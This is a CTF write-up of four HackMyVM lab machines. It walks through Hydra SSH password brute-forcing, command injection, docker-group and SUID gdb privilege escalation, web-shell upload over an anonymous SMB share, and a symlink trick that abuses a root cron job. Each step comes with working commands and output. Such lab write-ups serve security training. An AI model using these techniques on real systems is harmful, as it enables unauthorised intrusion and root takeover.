HackMyVM: Gift, Pwned, Connection and Suidy
A four box multi-event. lol.
Gift
SSH and HTTP. HTTP says:
Dont Overthink. Really, Its simple.
┌──(root💀kali)-[/opt/hackmyvm/gift]
└─# hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.24 -I
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-12 00:53:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.10.24:22/
[STATUS] 179.00 tries/min, 179 tries in 00:01h, 14344223 to do in 1335:36h, 16 active
[22][ssh] host: 10.10.10.24 login: root password: simple
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-12 00:56:02
┌──(root💀kali)-[/opt/hackmyvm/gift]
└─# ssh [email protected] 255 ⨯
[email protected]'s password:
IM AN SSH SERVER
gift:~#Yeah, they weren’t kidding.
Pwned
HTTP enumeration leads to /hidden_text/ which contains secret.dic which contains a list of directories. Most are dud but /pwned.vuln/ is not and contains FTP creds. From the FTP server we get an SSH key and username.
Once on the box we can run a shell script which allows command injection to pivot to our next user.
Welcome to linux.messenger
ariana:
selena:
ftpuser:
Enter username to send message : sh
Enter message for sh :sh
Sending message to sh
id
uid=1001(selena) gid=1001(selena) groups=1001(selena),115(docker)
which python3
/usr/bin/python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
selena@pwned:/home$Selena is in the docker group so we are home:
selena@pwned:/tmp$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
privesc latest 09ae39f0f8fc 17 months ago 88.3MB
<none> <none> e13ad046d435 17 months ago 88.3MB
alpine latest a24bb4013296 18 months ago 5.57MB
debian wheezy 10fcec6d95c4 2 years ago 88.3MB
selena@pwned:/tmp$ docker run -it -v /:/host/ alpine chroot /host/ bash
root@6861a7b8e459:/# cd /root
root@6861a7b8e459:~# ls -lash
total 28K
4.0K drwx------ 3 root root 4.0K Jul 10 2020 .
4.0K drwxr-xr-x 18 root root 4.0K Jul 6 2020 ..
4.0K -rw------- 1 root root 292 Jul 10 2020 .bash_history
4.0K -rw-r--r-- 1 root root 601 Jul 6 2020 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Jul 4 2020 .local
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rw-r--r-- 1 root root 429 Jul 10 2020 root.txt
root@6861a7b8e459:~#Connection
This one has SMB with anonymous login and the share suspiciously contains index.html; yes it’s linked to the webroot. We can upload a shell and we are away.
┌──(root💀kali)-[/opt/hackmyvm/connection]
└─# smbclient.py 10.10.10.26
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
Type help for list of commands
# shares
share
print$
IPC$
# use share
# ls
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 .
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 ..
drw-rw-rw- 0 Tue Sep 22 22:20:00 2020 html
# cd html
# ls
drw-rw-rw- 0 Tue Sep 22 22:20:00 2020 .
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 ..
-rw-rw-rw- 10701 Tue Sep 22 21:48:45 2020 index.html
# put test.txt
# ls
drw-rw-rw- 0 Sun Dec 12 01:31:51 2021 .
drw-rw-rw- 0 Tue Sep 22 21:48:39 2020 ..
-rw-rw-rw- 10701 Tue Sep 22 21:48:45 2020 index.html
-rw-rw-rw- 5 Sun Dec 12 01:31:51 2021 test.txt
# put shell.php
# put linpeas.shNote this box doesn’t have wget or curl, so it’s convenient to use SMB to upload linpeas too.
It’s also got GDB with the SUID bit set, so that’s the privesc:
www-data@connection:/tmp$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
GNU gdb (Debian 8.2.1-2+b3) 8.2.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
# cd /root
cd /root
# ls -lash
ls -lash
total 24K
4.0K drwx------ 3 root root 4.0K Sep 22 2020 .
4.0K drwxr-xr-x 18 root root 4.0K Sep 22 2020 ..
0 lrwxrwxrwx 1 root root 9 Sep 22 2020 .bash_history -> /dev/null
4.0K -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
4.0K drwxr-xr-x 3 root root 4.0K Sep 22 2020 .local
0 lrwxrwxrwx 1 root root 9 Sep 22 2020 .mysql_history -> /dev/null
4.0K -rw-r--r-- 1 root root 148 Aug 17 2015 .profile
4.0K -rwx------ 1 root root 33 Sep 22 2020 proof.txt
#SUIDY
This one was a bit trickier, but it’s also the only one rated Medium. The other three were all Easy. It’s SSH and HTTP.
At the bottom of robots.txt we find /shehatesme/ which says:
She hates me because I FOUND THE REAL SECRET!
I put in this directory a lot of .txt files.
ONE of .txt files contains credentials like “theuser/thepass” to access to her system!
All that you need is an small dict from Seclist!
I run feroxbuster:
feroxbuster -u http://10.10.10.27//shehatesme -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -t 200 -C 403 --no-recursion -x txtAnd generate a list of files, which I then download with wget:
while read p; do wget $p; done < files.txtAnd then I have a list of potential usernames and passwords. And it is obvious the creator has a sense of humour, since the creds are theuser:thepass. lol.
┌──(root💀kali)-[/opt/hackmyvm/suidy/files]
└─# ssh [email protected]
[email protected] password:
Linux suidy 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 27 00:41:28 2020
theuser@suidy:~$ sudo -l
-bash: sudo: orden no encontrada
theuser@suidy:~$We’ve got an SUID binary we can use to escalate to the next user:
theuser@suidy:/home/suidy$ ls -lash
total 52K
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 27 2020 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 suidyyyyy
theuser@suidy:/home/suidy$ ./suidyyyyy
suidy@suidy:/home/suidy$ whoami
suidy
suidy@suidy:/home/suidy$ cat note.txt
I love SUID files!
The best file is suidyyyyy because users can use it to feel as I feel.
root know it and run an script to be sure that my file has SUID.
If you are "theuser" I hate you!
-suidy
suidy@suidy:/home/suidy$I copy the binary to backup and try creating a new file; sure enough it gets an SUID bit set after 1 minute. We can’t see the cron job but it is running as root. However, the SUID is only for the file owner and not for root, e.g.
suidy@suidy:/home/suidy$ cp /bin/bash ./suidyyyyy
suidy@suidy:/home/suidy$ ls -lash
total 1,2M
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 08:03 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
1,2M -rwxr-xr-x 1 suidy theuser 1,2M dic 12 08:03 suidyyyyy
suidy@suidy:/home/suidy$ date
dom dic 12 08:04:16 CET 2021
suidy@suidy:/home/suidy$ ls -lash
total 1,2M
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 08:03 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
1,2M -rwsr-sr-x 1 suidy theuser 1,2M dic 12 08:03 suidyyyyy
suidy@suidy:/home/suidy$ ./suidyyyyy -p
suidy@suidy:/home/suidy$ id
uid=1001(suidy) gid=1000(theuser) grupos=1000(theuser),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
suidy@suidy:/home/suidy$So, how can we have a file owned by root? With a symlink.
suidy@suidy:/home/suidy$ ln -s /bin/bash suidyyyyy
suidy@suidy:/home/suidy$ ls -lash
total 52K
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 10:20 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
0 lrwxrwxrwx 1 suidy theuser 9 dic 12 10:20 suidyyyyy -> /bin/bash
suidy@suidy:/home/suidy$ ls -lash
total 52K
4,0K drwxr-xr-x 3 suidy suidy 4,0K dic 12 10:20 .
4,0K drwxr-xr-x 4 root root 4,0K sep 26 2020 ..
20K -rwsrwsr-x 1 root theuser 17K sep 26 2020 backup
4,0K -rw------- 1 suidy suidy 12 sep 27 2020 .bash_history
4,0K -rw-r--r-- 1 suidy suidy 220 sep 26 2020 .bash_logout
4,0K -rw-r--r-- 1 suidy suidy 3,5K sep 26 2020 .bashrc
4,0K drwxr-xr-x 3 suidy suidy 4,0K sep 26 2020 .local
4,0K -r--r----- 1 suidy suidy 197 sep 26 2020 note.txt
4,0K -rw-r--r-- 1 suidy suidy 807 sep 26 2020 .profile
0 lrwxrwxrwx 1 suidy theuser 9 dic 12 10:20 suidyyyyy -> /bin/bash
suidy@suidy:/home/suidy$ ./suidyyyyy -p
suidyyyyy-5.0# id
uid=1001(suidy) gid=1000(theuser) euid=0(root) egid=0(root) grupos=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(theuser)
suidyyyyy-5.0# cd /root
suidyyyyy-5.0#And done. Also it must be a bit quiet this arvo because on the frontpage under last bloods:
2021-12-12 10:21:42 ordnaryday got root in suidy
2021-12-12 08:00:10 ordnaryday got user in suidy
2021-12-12 07:40:21 ordnaryday got root in Connection
2021-12-12 07:33:27 ordnaryday got user in Connection
2021-12-12 07:28:16 ordnaryday got root in Pwned
2021-12-12 07:18:45 ordnaryday got user in Pwned
2021-12-12 07:10:23 ordnaryday got root in Gift
2021-12-12 07:10:11 ordnaryday got user in Gift
And yes root on suidy did take me longer but also I stopped for dinner.